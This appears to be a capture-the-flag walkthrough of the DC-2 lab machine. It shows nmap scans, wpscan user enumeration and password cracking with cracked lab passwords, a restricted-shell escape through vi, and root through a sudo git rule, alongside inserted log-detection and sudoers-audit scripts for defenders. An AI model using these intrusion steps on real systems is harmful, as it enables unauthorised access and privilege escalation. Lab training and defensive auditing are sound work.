Proving Grounds: DC-2 Walkthrough

Sanaullah Aman Korai
Aug 4, 2023

The DC-2 machine involved initial reconnaissance with Nmap, WordPress user enumeration, custom wordlist generation, password cracking, escaping a restricted shell, privilege escalation via a sudo misconfiguration, and using GTFOBins to achieve root access. This engagement highlighted the importance of proper user and privilege management in securing systems.

Let’s start with first things first. Let’s start the nmap scan to see what ports and services are running on the system.

nmap -A -sC -sV 192.168.210.194 -oN initialDC-2 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-04 06:54 EDT
Nmap scan report for dc-2 (192.168.210.194)
Host is up (0.15s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: DC-2 – Just another WordPress site
|_http-server-header: Apache/2.4.10 (Debian)
|_http-generator: WordPress 4.7.10

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.37 seconds

We got only one port from the initial scan. Let’s dig deeper and scan all ports.

Nmap scan report for dc-2 (192.168.210.194)
Host is up (0.15s latency).
Not shown: 56330 closed tcp ports (conn-refused), 9203 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.07 seconds

Now we have 2 ports running on the box: 80 (HTTP) and 7744 (SSH). Let’s enumerate the HTTP port. Since nmap has shown us the name of the site, let’s add it to our hosts file.

echo "192.168.210.194  dc-2" >> /etc/hosts

The Flag option on the webpage clearly got our attention. Let’s check what hint it has for us. So from this page, we got a really good hint to move ahead.

So, the first idea that came to us was to run a wpscan on the webpage and see what the scan enumerates.

wpscan --url http://dc-2 --enumerate p,t,u


[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

I found three user names: admin, jerry and tom. As said above, we need to use cewl, which generates a dictionary by spidering a website.

Therefore, we used cewl to build a password wordlist from the content of http://dc-2, as shown in the image.

Time to fire up wpscan with our username and password lists to find a valid user login combination.

wpscan --url http://dc-2 -U users -P password

[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

We got the passwords of two users. I tried these and logged on successfully; after enumerating the website, I found that I had to try another endpoint to get initial access to the machine.
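The three enumeration methods wpscan reports above (the wp-json users API, the author-ID pattern and login error messages) and the password run that follows all leave a recognisable trail in the web server's access log. The following detection sketch is an added example, not part of the original walkthrough; the log lines, the documentation-range client addresses and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

# Apache "combined" log line: client, timestamp, request line, status.
LOG = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                 r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
USER_API = re.compile(r"/wp-json/wp/v2/users")         # REST user listing
AUTHOR_ID = re.compile(r"[?&]author=(\d+)")            # author-ID pattern
LOGIN = re.compile(r"/(?:wp-login|xmlrpc)\.php")       # password endpoints

def detect(lines, author_threshold=3, login_threshold=5):
    """Map client IP -> list of reasons it looks like enumeration or guessing."""
    stats = defaultdict(lambda: {"api": 0, "authors": set(), "logins": 0})
    for line in lines:
        m = LOG.match(line)
        if not m:
            continue  # skip malformed or non-request lines
        s, path = stats[m["ip"]], m["path"]
        if USER_API.search(path):
            s["api"] += 1
        author = AUTHOR_ID.search(path)
        if author:
            s["authors"].add(author.group(1))
        if m["method"] == "POST" and LOGIN.search(path):
            s["logins"] += 1
    alerts = {}
    for ip, s in stats.items():
        reasons = []
        if s["api"]:
            reasons.append("rest-user-listing")
        if len(s["authors"]) >= author_threshold:   # many distinct IDs = sweep
            reasons.append("author-id-sweep")
        if s["logins"] >= login_threshold:
            reasons.append("login-guessing")
        if reasons:
            alerts[ip] = reasons
    return alerts

def _line(ip, method, path, status):
    # Constructed sample entry, not taken from the DC-2 host.
    return (f'{ip} - - [04/Aug/2023:07:10:00 -0400] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "-"')

SCANNER, VISITOR = "198.51.100.7", "203.0.113.20"   # documentation addresses
SAMPLE = ([_line(SCANNER, "GET", "/index.php/wp-json/wp/v2/users/?per_page=100&page=1", 200)]
          + [_line(SCANNER, "GET", f"/?author={n}", 301) for n in range(1, 6)]
          + [_line(SCANNER, "POST", "/wp-login.php", 200) for _ in range(8)]
          + [_line(VISITOR, "GET", "/?author=1", 301),
             _line(VISITOR, "POST", "/wp-login.php", 302)])

if __name__ == "__main__":
    print(detect(SAMPLE))
```

A single author-page visit or one login POST stays below the thresholds, so the ordinary visitor in the sample is not flagged.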

The other endpoint is SSH, which is open on port 7744. Let’s try to log in with the credentials we have obtained.

ssh tom@192.168.210.194 -p 7744  
tom@192.168.210.194's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug 4 08:18:55 2023 from 192.168.45.173
tom@DC-2:~$ ls /u-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a2': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier

ls: cannot access /u: No such file or directory

We get in, but we land in a restricted shell. Let’s check the PATH.

tom@DC-2:~$ echo $PATH
/home/tom/usr/bin

tom@DC-2:~$ ls /home/tom/usr/bin
less ls scp vi

So we have vi available. Let’s use vi to get an unrestricted shell, with the following commands.

tom@DC-2:~$ vi
Then, in vi:

:set shell=/bin/bash
:shell
:q

After escaping the restricted shell, we set SHELL to “/bin/bash” and prepend “/bin” and “/usr/bin” to PATH so that we can run Linux commands properly.

export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash

After that we can get the user flag and see the flag3.txt for the next hint.

According to the hint, we now need to switch user from tom to jerry, but we don’t have jerry’s login credentials. We then checked the sudoers list and found that tom can run “/usr/bin/git” as root without a password.

And then we can abuse git in multiple ways to get root on the machine!

https://gtfobins.github.io/gtfobins/git/

I used the following commands to get root.

sudo git -p help config
!/bin/bash

And boom we are root on the machine.
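Both weaknesses used in this walkthrough, vi inside tom's restricted PATH and git in the sudo rule, come down to a program that can start a shell from within itself. The audit below is an added example from the administrator's side, not part of the original walkthrough; the SHELL_CAPABLE list is a partial, hand-picked assumption (GTFOBins is the fuller reference) and the sudoers text is constructed to match what the walkthrough describes.

```python
import re

# Partial, constructed list of programs that can start a shell from inside
# themselves; GTFOBins is the fuller reference.
SHELL_CAPABLE = {"vi", "vim", "less", "more", "man", "git", "scp"}

# Shape of a sudoers user rule: user host = (runas) TAG: cmd[, cmd...]
RULE = re.compile(r"^(?P<who>\S+)\s+[^\s=]+\s*=\s*(?:\([^)]*\)\s*)?"
                  r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def audit_restricted_path(listing):
    """Programs in a restricted user's PATH directory that defeat rbash."""
    return sorted(n for n in listing.split() if n in SHELL_CAPABLE)

def audit_sudoers(text):
    """Return (user, command, passwordless) for shell-capable sudo grants."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue  # comments and Defaults lines grant nothing
        m = RULE.match(line)
        if not m:
            continue
        for cmd in m["cmds"].split(","):
            parts = cmd.split()
            binary = parts[0] if parts else ""
            if binary.rsplit("/", 1)[-1] in SHELL_CAPABLE:
                findings.append((m["who"], binary, "NOPASSWD" in m["tags"]))
    return findings

# Directory listing as shown in the walkthrough (ls /home/tom/usr/bin).
TOM_PATH_LISTING = "less ls scp vi"
# Constructed sudoers text modelled on the rule the walkthrough describes.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
tom ALL=(root) NOPASSWD: /usr/bin/git
"""

if __name__ == "__main__":
    print(audit_restricted_path(TOM_PATH_LISTING))
    print(audit_sudoers(SAMPLE_SUDOERS))
```

Every hit is a program to remove from the restricted PATH or from the sudo rule, since either placement hands the user a full shell.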

Stay tuned for next writeup :)
